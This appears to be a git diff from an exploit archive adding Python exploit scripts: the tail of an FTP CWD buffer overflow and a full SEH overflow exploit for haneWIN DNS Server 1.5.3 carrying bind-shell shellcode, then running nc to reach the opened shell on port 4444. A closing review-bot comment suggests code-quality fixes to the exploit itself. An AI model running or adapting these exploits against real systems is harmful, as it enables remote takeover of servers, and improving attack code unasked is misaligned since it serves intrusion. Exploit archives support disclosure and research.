+ "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
+ "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
+ "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
+ "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
+ "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
+ "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
+ "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
+ sploit = junk+espaddress+nops+shellcode
+ #create socket
+ conn = s.socket(s.AF_INET,s.SOCK_STREAM)
+ #establish connection to server
+ conn.connect((host,21))
+ #post ftp user
+ conn.send('USER '+fuser+'\r\n')
+ #wait for response
+ uf = conn.recv(1024)
+ #post ftp password
+ conn.send('PASS '+fpass+'\r\n')
+ #wait for response
+ pf = conn.recv(1024)
+ #send ftp command with sploit
+ conn.send('CWD '+sploit+'\r\n')
+ cf = conn.recv(1024)
+ #close connection
+ conn.close()
+
+
+
diff --git a/platforms/windows/remote/31260.py b/platforms/windows/remote/31260.py
new file mode 100755
index 000000000..e2434acbb
--- /dev/null
+++ b/platforms/windows/remote/31260.py
@@ -0,0 +1,76 @@
+#!/usr/bin/python
+
+# Exploit Title: haneWIN DNS Server (SEH)
+# Author: Dario Estrada (dash) https://intrusionlabs.org
+# Date: 2014-01-29
+# Version: haneWIN DNS Server 1.5.3
+# Vendor Homepage: http://www.hanewin.net/
+# Vulnerable app link:http://www.hanewin.net/dns-e.htm
+# Tested on: Windows XP SP3
+# Thanks to God, to my family and all my friends for always being there
+#
+# Description:
+# A SEH overflow occurs when large amount of data is sent to the server
+#
+import socket, sys, os, time
+
+usage = "\n Usage: " + sys.argv[0] + " \n"
+
+if len(sys.argv) < 2:
+ print usage
+ sys.exit(0)
+
+host = sys.argv[1]
+
+shellcode = (
+#msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
+"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
+"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
+"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
+"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
+"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
+"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
+"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
+"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
+"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
+"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
+"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
+"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
+"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
+"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
+"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
+"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
+"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
+"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
+"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
+"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
+"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
+"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
+"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
+"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
+"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
+)
+
+nSEH = '\xeb\x06\x90\x90'
+SEH = '\xd1\x07\xfc\x7f'
+opcode = "\xe9\xdf\xf6\xff\xff"
+junk = 'A' * (2324 - len(shellcode))
+padding = 'A' * 600
+
+buff = shellcode + junk + nSEH + SEH + opcode + padding
+
+print "[+] Connecting to %s:53" % (host)
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, 53))
+ aix= shellcode + 'A' * (2324 - len(shellcode))
+ print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))
+ s.send(buff)
+ print "[*] Exploit Sent Successfully!"
+ s.close()
+ print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"
+ time.sleep(5)
+ os.system ("nc -n " + host + " 4444")
+except:
+ print "[!] Could not connect to " + host + ":53\r"
+ sys.exit(0)
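Review bot: The bare `except:` at the end of the file catches every exception, including `KeyboardInterrupt` and `SystemExit`, and reports all of them as "Could not connect" even when `s.connect` succeeded and the failure came from a later `s.send`, `time.sleep` or `os.system` call; narrowing it to `except socket.error as e:` and printing `e` would make the message truthful, and the error path should exit non-zero (`sys.exit(1)`) rather than `sys.exit(0)`. The `aix = shellcode + 'A' * (2324 - len(shellcode))` line inside the `try` is never read (it duplicates `junk` computed above) and can be removed. The `usage` string shows no argument name between `sys.argv[0]` and the newline, which looks like an angle-bracketed placeholder lost in this rendering rather than an omission in the commit; it is worth confirming against the upstream file.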